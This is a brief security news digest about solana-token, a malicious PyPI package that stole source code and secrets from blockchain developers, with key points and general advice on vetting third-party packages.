Cybersecurity experts have identified a malicious Python package, solana-token, on PyPI that aimed to steal source code and secrets from developers working on blockchain projects. Although removed from PyPI after 761 downloads, it highlights ongoing supply chain risks in cryptocurrency development.
Affected: Developers, Blockchain systems, Software supply chains
Affected: Developers, Blockchain systems, Software supply chains
Keypoints
- The malicious package solana-token was designed to exfiltrate source code and developer secrets from infected machines.
- It was uploaded to the Python Package Index (PyPI) in early April 2024 and has since been removed.
- The package mimicked blockchain functions, especially targeting developers creating their own blockchain applications.
- It attempted to copy all files in the Python execution environment, aiming to steal sensitive cryptographic secrets.
- The distribution method remains unknown but likely involved promotion on developer-focused platforms.
- The incident emphasizes the importance of scrutinizing third-party packages before integration into development environments.
- Development teams are urged to monitor for suspicious behavior within open-source and third-party software to prevent supply chain attacks.
Read More: https://thehackernews.com/2025/05/malicious-pypi-package-posing-as-solana.html